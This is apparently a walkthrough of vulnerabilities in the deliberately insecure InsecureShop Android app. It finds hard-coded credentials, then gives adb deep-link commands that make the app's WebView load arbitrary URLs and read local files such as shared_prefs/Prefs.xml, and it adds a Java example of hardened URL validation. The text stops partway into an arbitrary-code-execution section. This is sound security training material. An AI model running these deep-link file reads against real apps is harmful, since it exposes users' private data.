Table of Contents Summary
- Vulnerability 1---Hard coding of account and password information
- Vulnerability 2---Insufficient URL verification
- Vulnerability 3---Arbitrary code execution
- Vulnerability 4---Intent redirection (unauthorized access to protected components)
- Vulnerability 5---Reading arbitrary files from local storage
Vulnerability 1—Account and password information are hard-coded
Decompile the APK, open the source code and search for "user". Viewing LoginActivity.class shows that the password verification logic lives in Util.
Opening Util.class shows that the account name and password are hard-coded.
Login successful.
Vulnerability 2—Insufficient URL verification
The declaration of WebViewActivity in AndroidManifest.xml and the corresponding WebViewActivity.class code are as follows:
From this we can see that WebViewActivity can be started through the following deep links and made to load any URL we specify.
insecureshop://com.insecureshop/web?url=https://www.baidu.com
insecureshop://com.insecureshop/webview?url=https://www.baidu.com?insecureshopapp.com
Method 1—Use adb to verify the vulnerability
adb shell am start -W -a xxx.action -d <deeplink>
# Parameter explanation
#- adb shell: enters the Android shell environment
#- am: the activity manager
#- start: starts an activity
#- -W: waits for the activity launch to complete before returning
#- -a: starts an activity for the given action
#- -d: passes a deep link as the intent data URI
Exploit 1—arbitrary url jump
adb shell am start -a android.intent.action.VIEW -d insecureshop://com.insecureshop/web?url=http://baidu.com
Exploit 2—Read local file
- Read application data directory
- Read application logs
- Read the sdcard
1. Read system files
/system/
/etc/hosts
/system/build.prop
adb shell am start -a android.intent.action.VIEW -d "insecureshop://com.insecureshop/web?url=file:///system/build.prop"
2. Read files related to the application data directory
adb shell am start -a android.intent.action.VIEW -d "insecureshop://com.insecureshop/web?url=file:///data/data/com.insecureshop/shared_prefs/Prefs.xml"
3. Read the sdcard file
sdcard/Download/magisk_install_log_2023-09-19T09.52.22.log
Method 2: Host a JavaScript web page
Exploit 3—XSS
Because the target never calls setJavaScriptCanOpenWindowsAutomatically(true), the alert pop-up does not appear, but the JavaScript still executes.
This can be used for XSS phishing, CSRF and so on.
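The root cause behind the arbitrary URL jump, the file:// reads and the XSS above is that the url query parameter is handed to the WebView without a structured check. The example below is added here and is not InsecureShop's own code: weakCheck() models a suffix-only comparison, which is an assumption about why the second deep link on the page ("https://www.baidu.com?insecureshopapp.com") is accepted, and isAllowed() is the hardened replacement that parses the URL, requires https and matches the host exactly against an allowlist. The class name, the allowlist and the sample inputs are constructed for the example.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

/*
 * Added example, not InsecureShop's own code: a URL policy for a WebView that is
 * reachable through a deep link. weakCheck() is an assumed model of the app's
 * check; isAllowed() is the hardened replacement.
 */
public final class WebViewUrlPolicy {

    // Constructed allowlist of hosts the WebView may load.
    private static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("insecureshopapp.com", "www.insecureshopapp.com"));

    /** Weak check (assumed pattern): looks only at the tail of the raw string. */
    public static boolean weakCheck(String url) {
        return url != null && url.endsWith("insecureshopapp.com");
    }

    /** Hardened check: parse first, then restrict the scheme and match the host exactly. */
    public static boolean isAllowed(String url) {
        if (url == null) {
            return false;
        }
        URI uri;
        try {
            uri = new URI(url);
        } catch (URISyntaxException e) {
            return false; // unparsable input is rejected rather than handed to loadUrl()
        }
        // file://, content://, javascript: and plain http are all refused here, which
        // closes the file:///system/build.prop and shared_prefs reads shown above.
        if (uri.getScheme() == null || !uri.getScheme().equalsIgnoreCase("https")) {
            return false;
        }
        // getHost() is null for opaque or host-less URIs; user-info and explicit ports
        // are refused so that only the plain host string takes part in the comparison.
        String host = uri.getHost();
        if (host == null || uri.getUserInfo() != null || uri.getPort() != -1) {
            return false;
        }
        return ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
    }

    // On the Android side, pair isAllowed() with WebSettings that remove the file://
    // surface entirely (these are real android.webkit.WebSettings methods):
    //   WebSettings s = webView.getSettings();
    //   s.setAllowFileAccess(false);
    //   s.setAllowFileAccessFromFileURLs(false);
    //   s.setAllowUniversalAccessFromFileURLs(false);
    // and only then: if (isAllowed(url)) webView.loadUrl(url);

    public static void main(String[] args) {
        // Constructed inputs; the second and third come from the deep links on the page.
        String[] samples = {
            "https://www.insecureshopapp.com",          // weak=true  hardened=true
            "https://www.baidu.com?insecureshopapp.com", // weak=true  hardened=false
            "file:///system/build.prop",                 // weak=false hardened=false
        };
        for (String s : samples) {
            System.out.printf("%-45s weak=%-5b hardened=%b%n", s, weakCheck(s), isAllowed(s));
        }
    }
}
```

Run it with `javac WebViewUrlPolicy.java && java WebViewUrlPolicy`. The second sample is the point of the exercise: the suffix check accepts it because the allowed domain sits in the query string, while the parsed host is www.baidu.com. The same isAllowed() check should also be applied inside a WebViewClient's shouldOverrideUrlLoading() so that a redirect from an allowed page cannot land on a host the initial check never saw.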
Vulnerability 3—Arbitrary code execution
1. Analyze the source code.
The target APK's LoginActivity contains the following code.
// Get the information of all installed applications and turn the List into an iterator
paramView = getPackageManager(